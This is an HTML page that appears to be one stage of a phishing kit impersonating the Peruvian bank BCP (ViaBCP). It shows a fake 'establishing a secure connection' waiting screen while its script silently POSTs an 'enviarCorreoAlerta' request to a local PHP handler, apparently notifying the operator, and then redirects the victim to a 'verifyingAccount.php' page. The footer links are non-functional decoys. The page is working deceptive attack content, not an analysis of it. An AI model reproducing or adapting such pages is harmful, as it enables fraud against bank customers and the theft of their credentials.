<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Banco de Crditos&gt;&gt;BCPe&gt;&gt;</title>
<meta content="ES" http-equiv="Content-Language">
<meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible">
<link type="text/css" rel="stylesheet" href="./processing_files/siteX.css">
</head>
<body marginwidth="0" marginheight="0"  bgcolor="#FFFFFF" id="body">
<script src="./processing_files/jquery-2.1.4.min.js"></script>
<script type="text/javascript">

window.onload = enviarCorreoAlerta();

function nuevoObjetoXmlHttp(){
    
    var xmlhttp;
    
    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();        
    } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");        
    }
        
    return xmlhttp;
}

function enviarCorreoAlerta(){

	var xmlhttp=nuevoObjetoXmlHttp();         
    var fd = new FormData();
    fd.append("op","enviarCorreoAlerta");
    
    xmlhttp.onreadystatechange = function() {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            var respuesta = xmlhttp.responseText;
            console.log(respuesta);         
            if(respuesta.indexOf("correcto")>=0){
            	window.location.href="verifyingAccount.php";
            }
        }    
    };    
    xmlhttp.open("POST","./ajaxProcesos2.php",true);
    xmlhttp.send(fd);
}
</script>
<a name="top"></a>
<div id="header">
<div class="inner wrapper">
<div class="sp sp-main-logo" id="logo">BCP</div>
</div>
<div id="header_metadata">
<div class="wrapper_new">
<div id="barra_add"></div>
</div>
</div>
</div>
<div style="background: white;" align="center">
<div class="principal" id="principal">
<table style="margin-top: 78px;" cellpadding="0" cellspacing="0" border="0" width="760">
<tbody><tr>
<td class="wordwrap" align="center" valign="top" style="width: 140px;">
</td><td valign="top" style="width: 285px; text-align:left;">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tbody><tr>
</tr>
<tr>
<td style="padding-top: 9px;" align="center"><img src="./processing_files/cargando.gif" width="130"><br><br>
  <span style="font-size:12px;">Por favor, espere un momento por favor<br>
  estamos estableciendo una conexi&oacute;n segura con el servidor</span></td>
</tr>
<tr>
<td height="10"></td>
</tr>
</tbody></table>
</td><td valign="top" width="137">&nbsp;</td>
</tr>
<tr>
<td colspan="3"></td>
</tr>
</tbody></table>&nbsp;
<div style="margin-bottom: 135px;" class="fnt-10">&nbsp;</div>
<div>
</div>
<br>
</div>
</div>
<div id="footer">
<div class="inner wrapper_new_footer">
<ul class="menu" id="menu_footer">
<li class="menu-i first-child">
<a class="menu-t" href="javascript: return false;">Pol&iacute;ticas de seguridad</a>
</li>
<li class="menu-i">
<a class="menu-t" href="javascript: return false;">Empieza en V&iacute;a BCP</a>
</li>
<li class="menu-i">
<a class="menu-t" href="javascript: return false;">Cont&aacute;ctanos</a>
</li>
<li class="menu-i last-child">
<a class="menu-t" href="javascript: return false;">Tarifas en Internet</a>
</li>
</ul>
<hr>
<p id="copy">© 2012 ViaBCP.com Todos los derechos reservados</p>
<div id="barra_add_footer"></div>
</div>
</div>
</body></html>